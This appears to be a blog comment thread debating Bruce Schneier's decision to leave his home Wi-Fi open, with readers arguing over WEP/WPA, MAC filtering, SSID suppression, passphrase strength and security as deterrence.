Though a determined industrial hacker will probably get in, they're pretty rare and most companies wouldn't have the budget to stop them anyway - they're essentially a risk of doing business like fire or professional indemnity. The majority of security is for deterring both amateur and employee thefts... and I'd even say it's right up there with the broken window mentality: if people see a booth with a security guard in it, they immediately know that the building is cared for and protected. If there is an IT policy paper, they understand that the IT care for their IT systems - even if that IT policy is a bit hard to work with. The absence of physical and digital security or checks and balances like auditing gives people who encounter it a sense that no one cares.
A very interesting thread/discussion for a change. I found decoy networks and honey pots to be very effective in fighting intruders.
How do you build a honey pot? You can google it.
I'm sorry, but I'm going to have to disagree. Even if WEP/WPA can be cracked easily, it's still better than nothing. If someone is sitting outside my house with a laptop and sees four or five wireless networks available, chances are he will connect to the one with no security. If I got WEP turned on, even with a weak password, chances are he will connect to my neighbor's network because it's not locked down.
Tell me, wouldn't you see more spam in the comments if you took the orange captcha off?
But I think I get it. Security is a tough problem. If you take the
option of mindlessly flipping a WPA or WEP switch off the table,
you're now forced to think more critically about the security of
(sigh) No, you don't get it.
Bruce said his reason right at the top:
To me, it's basic politeness. Providing internet access to guests
is kind of like providing heat and electricity, or a hot cup of
tea. But to some observers, it's both wrong and dangerous.
He then goes on to explain why he thinks its neither, but that explanation is not really the point. The above statement is.
Sure, your ISP wants you to lock down your wireless network. For that reason, they do everything they can to get you all worked up about wireless security. Their worst nightmare is for every neighborhood to have only 2 or 3 generous people providing access for everyone else. Its a matter of money to them.
But what does it profit *you* to do that work for them? Except in some rather unlikely scenarios, not a thing.
I notice a lot of other posters here don't seem to have read what Bruce wrote about this. You all really should before posting.
For the benifit of the lazy, here are some excerpts refuting a lot of what I see being said here:
I'm told that uninvited strangers may sit in their cars in front of my house, and use my network to send spam, eavesdrop on my passwords, and upload and download everything from pirated movies to child pornography. As a result, I risk all sorts of bad things happening to me, from seeing my IP address blacklisted to having the police crash through my door.
While this is technically true, I don't think it's much of a risk. I can count five open wireless networks in coffee shops within a mile of my house, and any potential spammer is far more likely to sit in a warm room with a cup of coffee and a scone than in a cold car outside my house. And yes, if someone did commit a crime using my network the police might visit, but what better defense is there than the fact that I have an open wireless network? If I enabled wireless security on my network and someone hacked it, I would have a far harder time proving my innocence.
Um, I think you have it wrong Jeff. Bruce's reasoning is just that its more polite to have an unsecured network. Your posting makes it seem as though he has a why bother type attitude. After reading his post, it sounds like he's just being a nice guy by not securing it.
I think you got it wrong Jeff. In Bruce's post, he says he's just leaving it unsecured as a courtesy to others. Your post implies that he isn't securing it because WEP or WPA isn't secure. Sounds like hes just a nice guy and thats why he doesn't add security.
Bruce's decision -- by his own description -- is not one of *promoting* leaving your AP unsecured. He states that he does so, and his reasons for doing so.
First, because he sees benefit in a society where open access points are ubiquitous; e.g. if his neighbors need access because they have problems with their ISP, they can borrow his (and vice-versa).
Second, because he sees very little to gain by doing so. If you participate on open networks often, you have to secure your hosts for open WiFi environments anyhow.
My personal, additional take on it is this: anyone who thinks of security as preventing use simply doesn't get it. Security is about availability, too. Why would you add the admin overhead of rotating your WPA passphrase, keeping your MAC filter list up to date, etc. if you don't have any real security gain?
Wow! Some of you people are very generous to be willing to share your internet service that you pay for with your neighbors. Unless my neighbors want to split the bill, they can get their own!
Wow! Some of you people are very generous to be willing to share
your internet service that you pay for with your neighbors. Unless
my neighbors want to split the bill, they can get their own!
Bruce Schneier wrote:
If someone were using my network to the point that it affected my
own traffic or if some neighbor kid was dinking around, I might
want to do something about it; but as long as we're all polite, why
should this concern me? Pay it forward, I say.
So if someone's causing problems, sure I'd do something about it. (A good example of this would be calling me up to ask for support or complain about downages on my own line, which a total mooch would almost certianly do.) But if not, what difference does it make to me? Why be selfish just for the sake of being selfish?
So he keeps his wireless open because it allows him to concentrate more on securing his computer? Seems to me that you could do both and it would be just that much more secure. After all, someone can't break into your PC if they can't get to your PC.
I've never been too worried about someone hacking into my computer... much like Jeff, my concern is also bandwidth. I've got a lot of neighbors around me and if even one of them was a peer-to-peer file sharer, that could kill me. Plus the hassles I'd have to deal with if they got caught doing anything illegal.
When I was setting up my new Vista laptop it turned out to be unhappy with suppressed SSID. Looking for a solution, I was browsing some Microsoft literature and found a link to Steve Riley's Security blog, and an interesting article about SSID suppression and MAC filtering.
Apparently you're safer NOT suppressing your SSID, as otherwise your PC has to send out a list of all SSIDs it wants to connect to, more frequently than the WAP broadcasts its own ID.
And MAC is readable from any packet, and easy enough to spoof, but at least it doesn't do any harm to keep filtering on.
So you're relying on encryption, almost entirely.
Having said that, I have long thought how nice it would be to be able to offer others the use of my redundant bandwidth. It's a sad world we live in, where considerations of corporate profits, terrorism and perversion have to take precedence.
33 characters is an arbitrary (and excessively high) standard for a strong pass phrase. Based on the technique described at
each character has 6.55 bits of entropy. So a 20 character passphrase would have over 128 bits of entropy, which is entirely adequate for protecting any wireless network.
Actually I think the illusion of security is fine - as long as the illusion is gong the right direction. If potential thieves think you have good security, it's a deterrent. That's why you can buy fake security cameras and blinking lights to make it look like you have a car alarm. When my ISP was down, I looked to see if there were any open wireless networks in my area, and I found one - but I also found at least 20 protected by WEP. I wouldn't bother to take the time to break into one - it's much easier to just drive over to McDonald's with my laptop.
Almost every home in America can be broken into with a hard kick or a crowbar, but people lock their doors anyway. This is usually enough to keep from being robbed, but it's not real security. Almost every business in America has a GLASS door on the front, and a burglar alarm that goes off way too late... this isn't security, but it does prevent most businesses from getting robbed.
I use wep at home simply to avoid interference with my neighbors and not because I'm worried about either downloading or hacking. Somehow we all seem to choose the same channel and depending on the weather see each other's networks. This way I don't print on their machines and they don't on mine. The primary security on any of the machines in my home network is local to each machine, and unfortunately depends on the security consciousness of my teenage children ;-) . If you've read Mitnick's how to book on fraud then you see that people are the security hole and to a large extent the coding algorithms only have to be good enough to make human factors attacks the only possible success.
I think everyone is missing the point when he says he leaves his wifi network open. He's saying that you should protect your data at more granular levels than just tossing a key or passphrase on your wifi. networks are more easily physically attacked - someone just walking in and plugging in a cat6 cable. Once they're on your network, what do you have in place to prevent theft or destruction of your data?
Think about that aspect - assume someone can and will get on your network - through a brute force attack, social engineering, or breaking and entering - what defense do you have now? Stating he keeps his network open is a way to get people to think about security a little more deeply, past algorythms and passphrases and such. Assuming a sufficiently motivated attacker will surpass such protection, where does that leave you, your data, and your business?
It's not intrusion but an humble request to the community here.
I have recently started an articles website and would request you (I will appreciate if you can) to please spare some time and post articles at my site.
I just use a WPA passphrase constructed from one of Jeff's regexes:
Unfortunately, now I have two problems...
If you dont want anyone trying to access your network, dont use wireless. If you dont mind sharing, use wireless. Simple as that, if you ask me.
I don't do anything sensitive over the air, so sniffing encryption isn't important to me. What's important is that no one gets full access to my network.
@Bear - I don't think anyone is missing that point really, and I think what Jeff is saying is that even if you have your data encrypted and whatnot, you should still protect the network itself because that is a resource that you paid for. I put my gun and some valuables in a safe, right next to my mean little dog, but I still lock the house.
I believe the 2WIRE### wireless access points are from the utilities company for reporting gas/elecrical usage. Thats how it works in our city.
MAC filtering will keep out most of the neighbours, but MAC addresses can be detected and spoofed using readily available tools (allegedly).
Just a sniff of a single packet from one of your whitelisted devices will reveal its MAC address in plain text, no guessing necessary.
If I have nothing to steal will the thief still come in the night?